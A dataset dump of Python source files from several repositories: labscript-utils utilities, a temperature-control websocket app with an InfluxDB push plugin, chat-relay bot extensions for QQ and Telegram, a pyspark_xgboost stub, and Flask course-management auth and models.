metadata
dict | text
stringlengths 60
3.49M
|
---|---|
{
"source": "JQIamo/labscript-utils",
"score": 3
} |
#### File: labscript-utils/labscript_utils/memprof.py
```python
import gc
class MemoryProfiler(object):
"""Class to count number instances of each type in the interpreter in order to
detect Python memory leaks"""
def __init__(self):
self.filepath = None
self.initial_counts = None
def count_types(self):
types = {}
for obj in gc.get_objects():
try:
c = obj.__class__
except AttributeError:
c = type(obj)
try:
types[c] += 1
except KeyError:
types[c] = 1
self.write_to_file(types)
return types
def write_to_file(self, types):
with open(self.filepath, 'w') as f:
names = list(types.keys())
names.sort(key=lambda name: -types[name])
for name in names:
f.write(str(name).rjust(60) + ' ' +
str(types[name]).rjust(8) + '\n')
def start(self, filepath='memprof.txt'):
self.filepath = filepath
self.initial_counts = self.count_types()
def check(self):
diffs = {}
types = self.count_types()
for type_ in types:
try:
diffs[type_] = types[type_] - self.initial_counts[type_]
except KeyError:
diffs[type_] = types[type_]
self.write_to_file(diffs)
return True
_memory_profiler = MemoryProfiler()
start = _memory_profiler.start
check = _memory_profiler.check
```
#### File: labscript_utils/qtwidgets/outputbox.py
```python
import qtutils.outputbox
from labscript_utils.ls_zprocess import Context
class OutputBox(qtutils.outputbox.OutputBox):
"""A subclass of qtutils.outputbox.OutputBox configured with security from
labconfig."""
def __init__(self, container, scrollback_lines=1000):
context = Context.instance()
# Since we are using our Context, which is a subclass of
# zprocess.security.SecureContext, we can listen on public interfaces. Insecure
# messages arriving from external interfaces will be disacarded
qtutils.outputbox.OutputBox.__init__(
self,
container=container,
scrollback_lines=scrollback_lines,
zmq_context=context,
bind_address='tcp://0.0.0.0',
)
``` |
{
"source": "JQIamo/labscript_utils",
"score": 2
} |
#### File: labscript_utils/labscript_utils/settings.py
```python
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import labscript_utils.h5_lock, h5py
from labscript_utils.qtwidgets.fingertab import FingerTabWidget
# Create a generic interface for displaying pages of settings
class Settings(object):
def __init__(self,storage='hdf5',file=None,parent = None,page_classes = []):
self.pages = {}
self.instantiated_pages = {}
self.dialog_open = False
self.parent = parent
self.storage = storage
self.file = file
self.callback_list = []
if not self.file:
raise Exception('You must specify a file to load/save preferences from')
for c in page_classes:
self.add_settings_interface(c)
# This function can be called to add a interface
# Each one of these will display as a seperate page in the settings window
# You can not add a class more than once!
# Classes must have unique Class.name attributes! (This might change later...)
def add_settings_interface(self,setting_class):
if setting_class.name in self.pages:
return False
self.pages[setting_class.name] = setting_class(self.load(setting_class.name))
return True
def load(self,name):
if self.storage == 'hdf5':
with h5py.File(self.file,'r+') as h5file:
# does the settings group exist?
if 'preferences' not in h5file:
h5file['/'].create_group('preferences')
# is there an entry for this preference type?
group = h5file['/preferences']
if name not in group.attrs:
group.attrs[name] = repr({})
try:
data = eval(group.attrs[name])
except Exception:
# TODO: log this properly
print('Could not load settings data for %s. It may contain data that could not be evaluated. All settings have now been lost'%name)
data = {}
return data
else:
raise Exception("the Settings module cannot handle the storage type: %s"%str(self.storage))
# A simple interface for accessing values in the settings interface
def get_value(self,settings_class,value_name):
return self.pages[settings_class.name].get_value(value_name)
# goto_page should be the CLASS which you wish to go to!
def create_dialog(self,goto_page=None):
if not self.dialog_open:
self.instantiated_pages = {}
# Create the dialog
self.dialog = QDialog(self.parent)
self.dialog.setModal(True)
self.dialog.accepted.connect(self.on_save)
self.dialog.rejected.connect(self.on_cancel)
self.dialog.setMinimumSize(800,600)
self.dialog.setWindowTitle("Preferences")
# Remove the help flag next to the [X] close button
self.dialog.setWindowFlags(self.dialog.windowFlags() & ~Qt.WindowContextHelpButtonHint)
# Create the layout
layout = QVBoxLayout(self.dialog)
#Create the Notebook
self.notebook = FingerTabWidget(self.dialog)
self.notebook.setTabPosition(QTabWidget.West)
self.notebook.show()
layout.addWidget(self.notebook)
# Create the button box
widget = QWidget()
hlayout = QHBoxLayout(widget)
button_box = QDialogButtonBox()
button_box.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)
button_box.accepted.connect(self.dialog.accept)
button_box.rejected.connect(self.dialog.reject)
hlayout.addItem(QSpacerItem(0,0,QSizePolicy.MinimumExpanding,QSizePolicy.Minimum))
hlayout.addWidget(button_box)
layout.addWidget(widget)
#sorted(a.items(),key=lambda x: x[1])
set_page = None
#self.temp_pages = []
for name, c in sorted(self.pages.items()):
page,icon = c.create_dialog(self.notebook)
# save page
self.instantiated_pages[c.__class__] = page
# Create label
#if isinstance(icon,gtk.Image):
# use their icon
# pass
#else:
# use default icon
# pass
self.notebook.addTab(page,c.name)
if goto_page and isinstance(c,goto_page):
# this is the page we want to go to!
set_page = page
# We do this here in case one of the settings pages specifically inserts itself in an out of order place (eg first)
# We hope that everything will be in alphabetical order, but maybe not!
if set_page:
self.notebook.tabBar().setCurrentIndex(self.notebook.indexOf(set_page))
pass
self.dialog.show()
self.dialog_open = True
else:
if goto_page and goto_page in self.instantiated_pages:
self.notebook.tabBar().setCurrentIndex(self.notebook.indexOf(self.instantiated_pages[goto_page]))
def register_callback(self,callback):
self.callback_list.append(callback)
def remove_callback(self,callback):
self.callback_list.remove(callback)
def on_save(self,*args,**kwargs):
# Save the settings
if self.storage == 'hdf5':
with h5py.File(self.file,'r+') as h5file:
group = h5file['/preferences']
for page in self.pages.values():
group.attrs[page.__class__.name] = repr(page.save())
else:
# this should never happen as the exception will have been raised on load!
pass
# run callback functions!
# Notifies other areas of the program that settings have changed
for callback in self.callback_list:
callback()
self.close()
def on_cancel(self,*args,**kwargs):
self.close()
def close(self,*args,**kwargs):
if self.dialog_open:
# Close the setting classes
for page in self.pages.values():
page.close()
self.dialog_open = False
self.dialog.deleteLater()
self.dialog = None
```
#### File: labscript_utils/labscript_utils/tracelog.py
```python
import sys
import inspect
import threading
from datetime import datetime
import traceback
def log(log_path=None, module_names=(), sub=False, all=False, mode='w'):
"""Trace and log Python execution.
output includes the time, thread name, containing function name, line number and source line.
Indentation before the thread name represents stack depth, indentation before source line is as in the source line itself.
log_path: the path of the desired output file to write to, or None for stdout (default=None)
module_names: list of module names that tracing is desired for (default=())
sub: whether submodules of the above modules should be traced (default=False)
all: whether all modules should be traced, in which case module_names is ignored (default=False)
mode: mode to open the output file in, if log_path is not None (default='w')
"""
if log_path is None:
outfile = sys.stdout
else:
outfile = open(log_path, mode, 1)
threadlocal = threading.local()
def per_thread_init():
threadlocal.stack_depth = 0
threadlocal.threadname = threading.current_thread().name
threadlocal.is_initialised = True
def write(module_name, lineno, function, message):
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] # chop microseconds to milliseconds
indentation = ' '*(2*threadlocal.stack_depth - 1)
output = "[%s]%s%s: %s:%s in %s: " % (timestamp, indentation, threadlocal.threadname, module_name, lineno, function)
if isinstance(message, list):
indent = len(output)
output += message[0]
for line in message[1:]:
output += ' '*indent + line
else:
output += message + '\n'
# This is atomic, thanks to the GIL, so we don't need to serialise access from multiple threads:
outfile.write(output)
def traceit(frame, event, arg):
if sys is None:
# Interpreter is shutting down
return
try:
assert threadlocal.is_initialised
except AttributeError:
per_thread_init()
if event == "call":
threadlocal.stack_depth += 1
elif event == "return":
threadlocal.stack_depth -= 1
else:
filename, lineno, function, code_context, index = inspect.getframeinfo(frame, context=1)
try:
module_name = frame.f_globals["__name__"]
except KeyError:
module_name = '<string>'
if module_name in module_names or all or (sub and any([module_name.startswith(s) for s in module_names])):
line = code_context[0].rstrip() if code_context else '<within exec() or eval()>'
if event == 'line':
write(module_name, lineno, function, line)
elif event == 'exception':
exc_type, exc_value, _ = arg
exception = traceback.format_exception_only(exc_type, exc_value)
write(module_name, lineno, function, exception)
return traceit
per_thread_init()
write('tracelog','','','\n\n***starting***\n')
threading.settrace(traceit)
sys.settrace(traceit)
```
#### File: labscript_utils/labscript_utils/zlock.py
```python
import sys
import subprocess
from socket import gethostbyname
from labscript_utils.ls_zprocess import get_config
from labscript_utils.setup_logging import LOG_PATH
from zprocess import start_daemon
def main():
config = get_config()
if gethostbyname(config['zlock_host']) != gethostbyname('localhost'):
msg = (
"Zlock not configured to run on this host according to labconfig: "
+ "zlock_host=%s" % config['zlock_host']
)
raise ValueError(msg)
cmd = [
sys.executable,
'-m',
'zprocess.zlock',
'--port',
config['zlock_port'],
'-l',
LOG_PATH,
]
if config['shared_secret_file'] is not None:
cmd += ['--shared-secret-file', config['shared_secret_file']]
elif config['allow_insecure']:
cmd += ['--allow-insecure']
else:
cmd += ['--no-allow-insecure']
if '--daemon' in sys.argv:
start_daemon(cmd)
else:
try:
subprocess.call(cmd)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
``` |
{
"source": "JQIamo/temperature-control-app",
"score": 2
} |
#### File: temperature_web_control/plugin/influx_push_plugin.py
```python
import time
import requests
import base64
from typing import Union
from logging import Logger
from temperature_web_control.plugin.plugin_base import PluginState
from temperature_web_control.server.app_core import TemperatureAppCore
from temperature_web_control.utils import Config
class TokenAuth(requests.auth.AuthBase):
def __init__(self, token):
self.token = token
def __call__(self, r):
r.headers['Authorization'] = f'Basic {self.token}'
return r
class InfluxPushPluginState(PluginState):
def __init__(self, config: Config, app_core: TemperatureAppCore, logger: Logger):
self.config = config
self.app_core = app_core
self.logger = logger
token = self.config.get("influx_plugin", "token", default=None)
if not token:
user = self.config.get("influx_plugin", "user")
password = self.config.get("influx_plugin", "password")
token = base64.b64decode(f"{user}:{password}".encode("utf-8"))
self.auth = TokenAuth(token)
self.url = self.config.get("influx_plugin", "influx_api_url")
self.database =self.config.get("influx_plugin", "database")
self.measurement = self.config.get("influx_plugin", "measurement")
self.interval = self.config.get("influx_plugin", "push_interval", default=5) * 60
self.last_push_time = 0
self.app_core.subscribe_to("status_available", self, self.on_status_available_event)
async def on_status_available_event(self, subscribers, message):
if time.time() - self.last_push_time < self.interval:
return
self.last_push_time = time.time()
try:
status = message['status']
t = f"{int(time.time()*1e9):d}"
req_url = requests.compat.urljoin(self.url, f"/write?db={self.database}")
self.logger.debug(f"Influx Push Plugin: Push to {req_url}")
req = []
for dev in status.values():
if 'temperature' not in dev:
pass
req.append(f"{self.measurement} {dev['name']}={dev['temperature']:.1f},{dev['name']}_units=\"C\" {t}")
self.logger.debug(f"Influx Push Plugin: Request {req}")
r = requests.post(req_url, data="\n".join(req), auth=self.auth, timeout=3)
r.raise_for_status()
except Exception as e:
self.logger.error("Influx Push Plugin: Error while making request:")
self.logger.exception(e)
async def run(self):
pass
async def initialize(config: Config, app_core: TemperatureAppCore, logger: Logger) -> Union[PluginState, None]:
if config.get("influx_plugin", default=None):
plugin = InfluxPushPluginState(config, app_core, logger)
return plugin
else:
return None
```
#### File: temperature_web_control/server/ws_server.py
```python
import json
import asyncio
from functools import wraps, partial
from logging import Logger
import websockets
class WebSocketServer:
def __init__(self, bind_addr, port, logger):
self.bind_addr = bind_addr
self.port = port
self.active_ws = []
self.event_handlers = {}
self.logger: Logger = logger
def register_event_handler(self, event, handler):
if event not in self.event_handlers:
self.event_handlers[event] = [handler]
else:
self.event_handlers[event].append(handler)
async def handler(self, websocket):
self.logger.info(f"WSServer: New connection from "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]}.")
self.active_ws.append(websocket)
try:
async for message in websocket:
self.logger.info(f"WSServer: Incoming message from "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]}.")
self.logger.info(message)
event = json.loads(message)
event_type = event['event']
if event_type in self.event_handlers:
event['_client_ws'] = websocket
await asyncio.gather(*[ handler(event, partial(self.send_event, websocket, event_type))
for handler in self.event_handlers[event_type] ])
except (websockets.ConnectionClosed, websockets.ConnectionClosedOK, websockets.ConnectionClosedError):
self.logger.info(f"WSServer: Connection to client "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]} closed.")
finally:
self.logger.info(f"WSServer: Remove client "
f"{websocket.remote_address[0]}:{websocket.remote_address[1]} from the broadcast list.")
self.active_ws.remove(websocket)
if 'disconnected' in self.event_handlers:
event = {
'event': 'disconnected',
'_client_ws': websocket
}
await asyncio.gather(*[handler(event, None) for handler in self.event_handlers['disconnected']])
async def send(self, websocket, message_dict):
try:
self.logger.debug(f"Send to : {websocket}" + json.dumps(message_dict))
await websocket.send(json.dumps(message_dict))
except websockets.ConnectionClosed:
pass
async def send_event(self, websocket, event, message_dict):
try:
message_dict.update({ 'event': event })
self.logger.debug(f"WSServer: Send to : {websocket}" + json.dumps(message_dict))
await websocket.send(json.dumps(message_dict))
except websockets.ConnectionClosed:
pass
async def broadcast(self, websocket_clients, message_dict):
self.logger.debug("Broadcast: " + json.dumps(message_dict))
websockets.broadcast(websocket_clients, json.dumps(message_dict))
async def serve_until_exit(self):
self.logger.info(f"WSServer: Websocket server running at ws://{self.bind_addr}:{self.port}")
async with websockets.serve(self.handler, self.bind_addr, self.port, ping_timeout=20, ping_interval=5):
await asyncio.Future()
```
#### File: temperature_web_control/test/test_omega.py
```python
from temperature_web_control.driver.io_device import IODevice
from temperature_web_control.driver.omega_driver import OmegaISeries
class DummyIODevice(IODevice):
def __init__(self):
self.dummy_resp = {}
self.last_send = b""
self.expectation = []
def send(self, data: bytes):
self.last_send = data
print(">> " + data.decode("utf-8"))
if self.expectation:
assert data == self.expectation[0]
del self.expectation[0]
def recv(self, max_len=-1):
assert self.last_send in self.dummy_resp
return self.dummy_resp[self.last_send]
def expect(self, expect):
self.expectation.append(expect)
if expect not in self.dummy_resp:
self.dummy_resp[expect] = b""
class TestOmega:
def test_read_temperature(self):
io_dev = DummyIODevice()
io_dev.dummy_resp = {
b"*R1F\r": b"R1F14\r",
b"*R08\r": b"R0842\r"
}
omega = OmegaISeries(io_dev, output=1)
assert omega.echo_enabled
assert omega.unit == "C"
io_dev.dummy_resp[b"*X01\r"] = b"X01075.4\r"
assert omega.temperature == 75.4
io_dev.dummy_resp[b"*R01\r"] = b"R012003E8\r"
assert omega.setpoint == 100
io_dev.expect(b"*D03\r")
omega.control_enabled = False
io_dev.expect(b"*E03\r")
omega.control_enabled = True
io_dev.expect(b"*W01A003E8\r")
omega.setpoint = -100
io_dev.dummy_resp[b"*R0C\r"] = b"R0C01\r"
assert not omega.auto_pid
io_dev.expect(b"*R0C\r")
io_dev.expect(b"*W0C05\r")
omega.auto_pid = True
io_dev.dummy_resp[b"*R17\r"] = b"R1700C8\r"
assert omega.p_param == 200
io_dev.dummy_resp[b"*R18\r"] = b"R1800B4\r"
assert omega.i_param == 180
io_dev.dummy_resp[b"*R19\r"] = b"R190000\r"
assert omega.d_param == 0
io_dev.expect(b"*W170096\r")
omega.p_param = 150
io_dev.expect(b"*W180096\r")
omega.i_param = 150
io_dev.expect(b"*W190096\r")
omega.d_param = 150
``` |
{
"source": "JQ-Networks/UMRExtensions",
"score": 2
} |
#### File: UMRExtensions/umr_extensions_demo/cmd_echo.py
```python
from typing import List
from unified_message_relay.Core.UMRType import ChatAttribute
from unified_message_relay.Core.UMRCommand import register_command, quick_reply
@register_command(cmd='echo', description='reply every word you sent')
async def command(chat_attrs: ChatAttribute, args: List):
"""
Prototype of command
:param chat_attrs:
:param args:
:return:
"""
if not args: # args should not be empty
return
await quick_reply(chat_attrs, ' '.join(args))
```
#### File: UMRExtensions/umr_extensions_demo/QQ_group_invite.py
```python
from typing import List, Dict
import asyncio
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core import UMRConfig
from unified_message_relay.Core.UMRCommand import register_command, quick_reply
from unified_message_relay.Core.UMRType import ChatAttribute, UnifiedMessage, MessageEntity, GroupID, DestinationMessageID, SendAction
from unified_message_relay.Core.UMRMessageRelation import get_relation_dict
from umr_coolq_driver import driver as QQ
from unified_message_relay.Core import UMRDriver
from aiogram import Bot, Dispatcher, executor, types
from aiogram.utils.callback_data import CallbackData
import threading
from time import sleep
logger = UMRLogging.get_logger('Plugin.QQ-group-invite')
# @register_command(cmd=['del', 'recall'], description='recall all related qq message sent by forward bot')
# async def command(chat_attrs: ChatAttribute, args: List):
# if chat_attrs.reply_to:
# message_relation = get_relation_dict(src_platform=chat_attrs.platform,
# src_chat_id=chat_attrs.chat_id,
# src_chat_type=chat_attrs.chat_type,
# message_id=chat_attrs.reply_to.message_id)
#
# dst_drivers = {k: v for k, v in driver_lookup_table.items() if isinstance(v, QQ.QQDriver)}
#
# if message_relation:
# filtered_message_ids: Dict[GroupID, DestinationMessageID] = {k: w for k, w in message_relation.items() if
# k.platform in dst_drivers}
# if filtered_message_ids:
# for key, value in filtered_message_ids.items():
# asyncio.run_coroutine_threadsafe(dst_drivers[value.platform].delete_msg(message_id=value.message_id), dst_drivers[value.platform].loop)
# reply_text = 'Message recalled'
# else:
# reply_text = 'No related QQ message found'
# else:
# reply_text = 'Message not recallable'
# else:
# reply_text = 'No message specified, please reply to a message'
#
# await quick_reply(chat_attrs, reply_text)
bot_token = UMRConfig.config.get('TelegramConsole')
admin_list = UMRConfig.config.get('BotAdmin', dict())
if admin_list:
admin_list = admin_list.get('Telegram')
accept_cb = CallbackData('request', 'result', 'driver', 'request_type', 'handle')
# todo post init trigger
sleep(5)
dst_drivers = {k: v for k, v in UMRDriver.driver_lookup_table.items() if isinstance(v, QQ.QQDriver)}
def get_keyboard(driver: str, request_type: str, handle: str):
return types.InlineKeyboardMarkup().row(
types.InlineKeyboardButton('Accept', callback_data=accept_cb.new(type='accept', driver=driver,
request_type=request_type, handle=handle)),
types.InlineKeyboardButton('Decline', callback_data=accept_cb.new(type='decline', driver=driver,
request_type=request_type, handle=handle))
)
def start():
def run():
def handle_exception(loop, context):
# context["message"] will always be there; but context["exception"] may not
msg = context.get("exception", context["message"])
logger.exception('Unhandled exception: ', exc_info=msg)
logger.debug('Running qq-group-invite start')
loop = asyncio.new_event_loop()
loop.set_exception_handler(handle_exception)
asyncio.set_event_loop(loop)
bot = Bot(token=bot_token)
dp = Dispatcher(bot)
for driver_name, driver in dst_drivers.items():
@driver.bot.on_request()
async def handle_event(context):
user_id = context.get('user_id')
stranger_name = driver.bot.get_stranger_info(user_id=user_id).get('nickname', str(user_id))
if context['request_type'] == 'group':
group_name = driver.bot.get_group_info(group_id=context["group_id"]) \
.get('group_name', str(context["group_id"]))
if context['sub_type'] == 'add':
action = 'group_add'
message = f'"{stranger_name}" wants to join group "{group_name}".'
else:
action = 'group_invite'
message = f'"{stranger_name}" wants to add you to group "{group_name}".'
elif context['request_type'] == 'friend':
action = 'friend'
message = f'"{stranger_name}" wants to add you as friend.'
else:
logger.info('unhandled event: ' + str(context))
return
for chat_id in admin_list:
asyncio.run_coroutine_threadsafe(
bot.send_message(chat_id, message,
reply_markup=get_keyboard(driver_name, action, context['flag'])), loop)
@dp.callback_query_handler(accept_cb.filter(result=['accept', 'decline']))
async def callback_vote_action(query: types.CallbackQuery, callback_data: dict):
logger.info('Got this callback data: %r', callback_data)
await query.answer() # don't forget to answer callback query as soon as possible
callback_data_action = callback_data['result']
callback_driver = dst_drivers[callback_data['driver']]
callback_request_type = callback_data['request_type']
callback_handle = callback_data['handle']
if callback_data_action == 'accept':
if callback_request_type == 'group_add':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='add', approve=True)
elif callback_request_type == 'group_invite':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='invite', approve=True)
else:
callback_driver.bot.set_friend_add_request(flag=callback_handle, approve=True)
else:
if callback_request_type == 'group_add':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='add', approve=False)
elif callback_request_type == 'group_invite':
callback_driver.bot.set_group_add_request(flag=callback_handle, sub_type='invite', approve=False)
else:
callback_driver.bot.set_friend_add_request(flag=callback_handle, approve=False)
await bot.edit_message_text(
query.message.text + '\nAccepted' if callback_data_action == 'accept' else '\nDeclined',
query.from_user.id,
query.message.message_id
)
executor.start_polling(dp, skip_updates=True, loop=loop)
t = threading.Thread(target=run)
t.daemon = True
UMRDriver.threads.append(t)
t.start()
logger.debug(f'Finished qq-group-invite initialization')
if bot_token and admin_list:
start()
```
#### File: UMRExtensions/umr_extensions_demo/QQ_recall.py
```python
from typing import List, Dict
import asyncio
from unified_message_relay.Core import UMRLogging
from unified_message_relay.Core.UMRCommand import register_command, quick_reply
from unified_message_relay.Core.UMRType import ChatAttribute, UnifiedMessage, MessageEntity, GroupID, DestinationMessageID, SendAction
from unified_message_relay.Core.UMRMessageRelation import get_relation_dict
from umr_coolq_driver import driver as QQ
from unified_message_relay.Core.UMRDriver import driver_lookup_table
logger = UMRLogging.get_logger('Plugin.QQ-recall')
@register_command(cmd=['del', 'recall'], description='recall all related qq message sent by forward bot')
async def command(chat_attrs: ChatAttribute, args: List):
if chat_attrs.reply_to:
message_relation = get_relation_dict(src_platform=chat_attrs.platform,
src_chat_id=chat_attrs.chat_id,
src_chat_type=chat_attrs.chat_type,
message_id=chat_attrs.reply_to.message_id)
dst_drivers = {k: v for k, v in driver_lookup_table.items() if isinstance(v, QQ.QQDriver)}
if message_relation:
filtered_message_ids: Dict[GroupID, DestinationMessageID] = {k: w for k, w in message_relation.items() if
k.platform in dst_drivers}
if filtered_message_ids:
for key, value in filtered_message_ids.items():
asyncio.run_coroutine_threadsafe(dst_drivers[value.platform].bot.delete_msg(message_id=value.message_id), dst_drivers[value.platform].loop)
reply_text = 'Message recalled'
else:
reply_text = 'No related QQ message found'
else:
reply_text = 'Message not recallable'
else:
reply_text = 'No message specified, please reply to a message'
await quick_reply(chat_attrs, reply_text)
``` |
{
"source": "jq/pyspark_xgboost",
"score": 3
} |
#### File: pyspark_xgboost/pyspark_xgboost/xgboost.py
```python
def train_with_dataframe(df, params, rounds, workers, use_external_memory):
assert rounds >= 0
# assume spark_session.conf.set("spark.sql.execution.arrow.enabled", "true")
pdf = df.toPandas()
return 0
```
#### File: pyspark_xgboost/tests/test_udf.py
```python
from pyspark import SQLContext
from pyspark.sql.functions import pandas_udf, PandasUDFType
from pyspark.sql.types import IntegerType, StringType, LongType, DoubleType, StructType, StructField
@pandas_udf(StringType())
def to_upper(s):
return s.str.upper()
# can't use "integer" or 'integer'
@pandas_udf(IntegerType(), PandasUDFType.SCALAR)
def add_one(x):
# TODO this is not print out..
print("add_one")
return x + 1
type = StructType([
StructField("id", IntegerType(), True),
StructField("v", DoubleType(), True),
])
@pandas_udf(type, PandasUDFType.GROUPED_MAP)
def normalize(pdf):
v = pdf.v
print("mean: ")
print(v.mean())
return pdf.assign(v=(v - v.mean()) / v.std())
def group_by(spark_context, spark_session):
sql_sc = SQLContext(spark_context)
spark_session.conf.set("spark.sql.execution.arrow.enabled", "true")
df = sql_sc.createDataFrame([(1, 1.0), (1, 2.0), (2, 3.0), (2, 5.0), (2, 10.0)],
("id", "v"))
# TODO count return Py4JJavaError: An error occurred while calling o71.count.
df.groupby("id").apply(normalize).count()
# https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.functions.pandas_udf
def test_udf(spark_context, spark_session):
sql_sc = SQLContext(spark_context)
spark_session.conf.set("spark.sql.execution.arrow.enabled", "true")
df = sql_sc.createDataFrame([(1, "<NAME>", 21)],
("id", "name", "age"))
# df.printSchema()
#
# df.show()
slen = pandas_udf(lambda s: s.str.len(), IntegerType())
# below is similar to @
# upper = pandas_udf(to_upper, StringType())
# addOne = pandas_udf(add_one, IntegerType(), PandasUDFType.SCALAR)
# this works
df.select("name").show()
# this doesn't work, Caused by: java.io.EOFException
# at java.io.DataInputStream.readInt(DataInputStream.java:392)
# seems related to slen output int
# df.select(slen("name").alias("slen(name)")).show()
# TODO this hit same error
# df.select(to_upper("name")).show()
print(df.select(slen("name").alias("slen(name)"),
to_upper("name"), add_one("age")).count())
``` |
{
"source": "jqqqqqqqqqq/CourseCenter",
"score": 3
} |
#### File: CourseCenter/app/auths.py
```python
from flask import flash, redirect, url_for
from flask_login import current_user
from .models.models import Student, Teacher, Course
from functools import wraps
class UserAuth:
"""
权限认证装饰器,对应装饰器应用在route下即可,若权限不够将返回主页
"""
@staticmethod
def dean(func):
@wraps(func)
def decorated(*args, **kwargs):
if not current_user.user_type() == 0:
flash('无权限', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def teacher(func):
@wraps(func)
def decorated(*args, **kwargs):
if not current_user.user_type() == 1:
flash('无权限', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def student(func):
@wraps(func)
def decorated(*args, **kwargs):
if not current_user.user_type() == 2:
flash('无权限!', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def teacher_course_access(func):
@wraps(func)
def decorated(*args, **kwargs):
if not Course.query.filter_by(id=kwargs['course_id']).filter(
Course.teachers.any(id=current_user.id)).first():
flash('无权限!', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
@staticmethod
def student_course_access(func):
@wraps(func)
def decorated(*args, **kwargs):
if not Course.query.filter_by(id=kwargs['course_id']).filter(
Course.students.any(id=current_user.id)).first():
flash('无权限!', 'danger')
return redirect(url_for('main.index'))
else:
return func(*args, **kwargs)
return decorated
```
#### File: app/models/models.py
```python
from app import db, login_manager
from flask_login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from flask import session
SCRelationship = db.Table('sc_relationship', db.Model.metadata,
db.Column('student_id', db.Integer, db.ForeignKey('students.id')),
db.Column('course_id', db.Integer, db.ForeignKey('courses.id'))
)
TCRelationship = db.Table('tc_relationship', db.Model.metadata,
db.Column('teacher_id', db.Integer, db.ForeignKey('teachers.id')),
db.Column('course_id', db.Integer, db.ForeignKey('courses.id'))
)
class DeanInfo(UserMixin, db.Model):
__tablename__ = 'deanInfo'
id = db.Column(db.Integer, primary_key=True)
password_hash = db.Column(db.String(128))
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
def check_id(self):
return self.id
@staticmethod
def user_type():
return 0
@staticmethod
def init_dean():
"""野兽先辈管理员说"""
dean = DeanInfo.query.first()
if dean is None:
dean = DeanInfo(id=810)
dean.password = '<PASSWORD>'
db.session.add(dean)
db.session.commit()
def __repr__(self):
return '<DeanInfo %r>' % self.id
class Semester(db.Model):
__tablename__ = 'semesters'
id = db.Column(db.Integer, primary_key=True)
base_info = db.Column(db.Text)
begin_time = db.Column(db.Date)
end_time = db.Column(db.Date)
def __repr__(self):
return '<Semester %r>' % self.id
class Student(UserMixin, db.Model):
__tablename__ = 'students'
id = db.Column(db.Integer, primary_key=True)
password_hash = db.Column(db.String(128))
name = db.Column(db.VARCHAR(length=50, convert_unicode=True))
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
@staticmethod
def init_student():
student = Student.query.first()
if student is None:
student = Student(id=666)
student.password = '<PASSWORD>'
db.session.add(student)
db.session.commit()
@staticmethod
def user_type():
return 2
def __repr__(self):
return '<Student %r>' % self.id
class Team(db.Model):
__tablename__ = 'teams'
id = db.Column(db.Integer, primary_key=True)
owner_id = db.Column(db.Integer, db.ForeignKey('students.id'))
owner_grade = db.Column(db.Float, default=0)
team_name = db.Column(db.VARCHAR(length=50, convert_unicode=True))
status = db.Column(db.Integer, default=0) # 0: building 1: pending 2: accepted 3: rejected 4: dismiss
reject_reason = db.Column(db.Text)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
members = db.relationship('TeamMember', backref='team')
owner = db.relationship('Student', uselist=False)
submissions = db.relationship('Submission', backref='team')
@property
def number_of_members(self):
return len([a for a in self.members if a.status == 1]) + 1
def __repr__(self):
return '<Team %r>' % self.id
@property
def order(self):
return Team.query.filter_by(course_id=self.course_id).all().index(self)
@staticmethod
def team_list(course_id):
teams = Team.query.filter_by(course_id=course_id).all()
order = 1
for team in teams:
team.order = order #为返回的 team 增加 order (顺序) 属性
order += 1
return teams
class TeamMember(db.Model):
__tablename__ = 'team_members'
id = db.Column(db.Integer, primary_key=True)
student_id = db.Column(db.Integer, db.ForeignKey('students.id'))
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
status = db.Column(db.Integer, default=0) # 0: pending 1: accepted 2: rejected
grade = db.Column(db.Float, default=0)
student = db.relationship('Student', uselist=False)
def __repr__(self):
return '<TeamMember %r>' % self.id
class Homework(db.Model):
__tablename__ = 'homework'
id = db.Column(db.Integer, primary_key=True)
course_id = db.Column(db.Integer, db.ForeignKey('courses.id'))
name = db.Column(db.VARCHAR(length=50, convert_unicode=True))
base_requirement = db.Column(db.Text)
begin_time = db.Column(db.DateTime)
end_time = db.Column(db.DateTime)
weight = db.Column(db.Integer)
max_submit_attempts = db.Column(db.Integer)
submissions = db.relationship('Submission', backref='homework')
def __repr__(self):
return '<Homework %r>' % self.id
@property
def order(self):
return Homework.query.filter_by(course_id=self.course_id).all().index(self)
@staticmethod
def homework_list(course_id):
homeworks = Homework.query.filter_by(course_id=course_id).all()
order = 1
for homework in homeworks:
homework.order = order #为返回的 homework 增加 order (顺序) 属性
order += 1
return homeworks
class Submission(db.Model): # 学生提交作业信息
__tablename__ = 'submissions'
id = db.Column(db.Integer, primary_key=True)
homework_id = db.Column(db.Integer, db.ForeignKey('homework.id'))
team_id = db.Column(db.Integer, db.ForeignKey('teams.id'))
submitter_id = db.Column(db.Integer, db.ForeignKey('students.id'))
text_content = db.Column(db.Text)
score = db.Column(db.Integer)
comments = db.Column(db.Text)
submit_attempts = db.Column(db.Integer)
submit_status = db.Column(db.Integer) # 0: 提交未批改 1: 已批改
def __repr__(self):
return '<Submission %r>' % self.id
class Attachment(db.Model): # 学生提交作业附件信息
__tablename__ = 'attachments'
